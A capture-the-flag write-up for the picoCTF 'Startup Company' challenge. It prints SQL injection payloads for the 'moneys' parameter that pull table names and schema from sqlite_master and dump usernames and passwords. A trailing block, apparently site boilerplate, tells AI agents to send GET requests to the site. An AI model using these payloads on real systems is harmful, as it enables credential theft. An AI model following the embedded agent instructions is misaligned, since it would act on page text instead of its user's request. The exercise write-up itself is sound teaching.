# Startup Company (180) ## Problem Do you want to fund my startup? {% embed url="" %} ## Solution ![](/files/-MX23cwNtT8aFyaHnLlM) The query probably looks something like: ```sql UPDATE some_table SET latest_contribution = WHERE user_id = ``` So we can get information displayed in the green text by manipulating the `moneys=` parameter: ![](/files/-MX23zSInibWeKhvA7xA) The SQLite version is 3.22.0: ![](/files/-MX23fS3kLGEk3t-aasd) ### Getting Table Names `captcha=23&moneys=' || (SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master)` Note that `GROUP_CONCAT` is required to concatenate all the `tbl_name` values into a single string. Otherwise, we might miss out on some valuable data. ![](/files/-MX23h5JQQ32Z-Semzzs) ### Getting Column Names `captcha=53&moneys='|| (SELECT GROUP_CONCAT(sql) FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='startup_users');` ![](/files/-MX23iSAmTsibmnl111x) ### Dumping Data `captcha=36&moneys='|| (SELECT GROUP_CONCAT(nameuser) FROM startup_users);` ![](/files/-MX23jg7qaz4zkPgmoqT) Indeed, our flag is hidden in the `wordpass` value for the `the_real_flag` user! `captcha=66&moneys='|| (SELECT GROUP_CONCAT(wordpass) FROM startup_users);` ![](/files/-MX23kzpUpOZVuR2JeB6) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ctf.zeyu2001.com/2021/picoctf/startup-company-180.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.